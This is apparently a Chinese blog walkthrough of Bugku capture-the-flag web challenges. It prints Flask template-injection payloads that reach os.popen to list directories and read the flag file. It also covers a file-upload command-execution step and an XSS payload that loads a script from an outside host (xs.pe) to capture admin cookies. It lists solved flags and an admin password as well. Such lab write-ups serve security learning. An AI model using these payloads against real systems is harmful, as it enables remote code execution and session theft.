目录
第一关(Simple_SSTI_1)
查看源码,需要我们在flask里建立一个SECRET_KEY
直接访问URL+?flag={{ config.SECRET_KEY}}得到flag
输入flag
第二关(Simple_SSTI_2)
查看源码
ls查看目录
?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
先查看"app"目录
?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
发现flag,cat查看
?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
输入flag
第三关(Flask_FileUpload)
查看源码
使用os.system函数执行操作系统命令,拓展名用.jpg
上传
上传成功
查看源码,发现flag
用cat查看flag
得到flag <!-- flag{e13116c6a0d47819c5a246330c444339} -->
输入flag
第四关(留言板)
扫描目录(由于已提交flag,这份是第二份IP的扫描目录)
复制配置代码
上传<sCRiPt sRC=//xs.pe/MJI></sCrIpT>
这里账号为admin 密码为011be4d65feac1a8
也可以输入“<script>alert(document.cookie)</script>”在页面弹出flag
”已有主机上线“,在cookie也有flag
输入flag
第五关(滑稽)
访问查看源码,得到flag(费眼QAQ)
<!--flag{a72c796cb88ed7fc69c8cba81046c531}-->
输入flag
第六关:(持续更新ing)
标签:bugku,查看,Simple,__.__,flag,源码,攻略,config From: https://blog.csdn.net/qq_68186313/article/details/140808765